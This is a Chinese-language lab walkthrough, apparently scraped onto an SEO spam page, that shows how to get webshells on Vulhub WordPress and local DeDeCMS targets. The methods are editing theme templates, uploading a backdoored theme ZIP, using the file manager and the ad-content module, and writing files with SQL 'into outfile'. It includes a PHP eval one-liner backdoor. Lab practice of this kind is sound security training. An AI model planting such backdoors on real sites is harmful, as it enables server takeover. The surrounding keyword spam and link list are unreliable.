当前位置: 首页 > news >正文

网站建站加盟网站设计案例方案

网站建站加盟,网站设计案例方案,深圳 互联网公司,wordpress标题怎么Wordperss漏洞 环境搭建 #执⾏命令 cd /vulhub/wordpress/pwnscriptum docker-compose up -d #靶场地址 http://8.155.7.173:8080/wp-admin/ 注册账号 登录 漏洞一#xff1a;后台修改模板拿WebShell 步骤一#xff1a;思路是修改其WP的模板写入⼀句话木马后门并访问其文件… Wordperss漏洞 环境搭建 #执⾏命令 cd /vulhub/wordpress/pwnscriptum docker-compose up -d #靶场地址 http://8.155.7.173:8080/wp-admin/ 注册账号 登录 漏洞一后台修改模板拿WebShell 步骤一思路是修改其WP的模板写入⼀句话木马后门并访问其文件即可GetShell登陆WP后点击 【Appearance】 --author-bio.php 步骤二在其模板中插入一句话木马代码..点击 【Update File】 按钮 ?php eval($_POST[123]);? 步骤三访问以下连接即可获取WebShell http://8.155.7.173:8080/wp-content/themes/twentyfifteen/author-bio.php 步骤四尝试蚁剑连接获取webshell 漏洞二上传主题拿WebShell 步骤⼀接着上⼀个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP⽂件 先去下载一个免费模板 https://blog.csdn.net/m0_59768231/article/details/144777066?spm1001.2014.3001.5502 解压后打开第一个文件夹写入一句话木马 重新压缩为一个.zip压缩包 步骤二找到网站上传模板主题的位置 选中我们刚才重新压缩好的文件 步骤三访问以下连接即可获取WebShell http://8.155.7.173:8080/wp-content/themes/moban-1354265872-wordpress329-sprout-in-hands-10/1.php 步骤四尝试蚁剑连接获取webshell DeDeCMS漏洞 环境搭建 傻瓜式安装 漏洞一通过文件管理器上传WebShel 步骤⼀:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件可以通过⽂件管理器上传php文件获取webshell 登陆网站后台 步骤二登陆到后台点击 【核心】 --》 【文件式管理器】 --》 【文件上传】 将准备好的恶意代码上传 步骤三访问上传成功后的文件 http://127.0.0.1/dedecms/uploads/1.php 漏洞二修改模板文件拿WebShell 步骤⼀与WPCMS类似直接修改模板拿WebShell..点击 【模板】 --》 【默认模板管理】 --》【index.htm】 -- 【修改】 进入后添加恶意代码 步骤二点击 【胜成】 --》 【更新主页HTML】 --》将主页位置修改为【../index.php 】--》点击 【生成静态】 --》点击 【更新主页】 再次访问站点首页可发现变化 步骤三访问主页phpinfo更新成功 漏洞三后台任意命令执行拿WebShell 步骤一点击 【模块】 --》 【广告管理】 --》 【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】 步骤二点击【代码】--》在图中显示的路径与站点进行拼接 http://127.0.0.1/dedecms/plus/ad_js.php?aid1 步骤三使用蚁剑测试连接 漏洞四通过后台sql命令执行拿webshell 步骤一访问系统---sql命令行工具---执行 select basedir获取mysql路径由此瑞测网站绝对路径 猜测绝对路径为E:/phpStudy/PHPTutorial/ 步骤二into outfile写入一句话木马 步骤三使用蚁剑测试连接
http://www.yayakq.cn/news/4594/

相关文章:

  • 西安哪些做网站的公司好廊坊购物网站开发设计
  • 如何做网站产品图片wordpress kan主题
  • 山东省住房城乡建设部网站首页自己做网站开网店
  • 自己做的网站怎么管理用户可画简历模板官网
  • 做网站银川深圳网站运营托管
  • 网站删除代码稷山网站建设
  • 宿主选择 网站建设做企业网站哪家公司好
  • 手机做推广比较好的网站怎样自己做网站赚钱吗
  • 苏州网站设计服务免费注册网站域名可以用吗
  • 上海网站开发公司排名温州专业手机网站制作哪家便宜
  • 精品课程网站建设的背景及意义网站建设没付尾款
  • 网站开发数据库设计怎么建设淘客自己的网站、
  • 济南冰河世纪网站建设青海小学网站建设
  • 企业网站seo案例分析新手学做百度联盟网站
  • 网页美工设计软件seo营销是什么意思
  • 营销网站开发系统北京建设信源公司网站
  • 旌阳区黄河开发建设网站怎样做中考成绩查询网站
  • 怎么在网站做推广2023年天津市施工招标公告时间
  • 网站建设公司浙江华企祝明电子商务网站建设实验报告
  • 网站浏览器兼容性问题wordpress 4.5 中文404
  • 深圳网站建设排行化妆品网站建设项目计划书
  • 公司网站创建重庆seo排名技术
  • 天津网站优化公司哪家专业建站精灵网站模板
  • 写作网站投稿平台网页设计资料的网站
  • 山西龙采网站建设合同网站换域名
  • 云安区学校网站建设统计表大连开发区社保网站
  • 网站长期建设运营计划书做门户网站建设多少钱
  • 公司的网站备案手续只用网站开发VS就安装那些就够了
  • 图片滤镜网站开发做网站的详细流程
  • 南山模板网站建设公司wordpress点击下载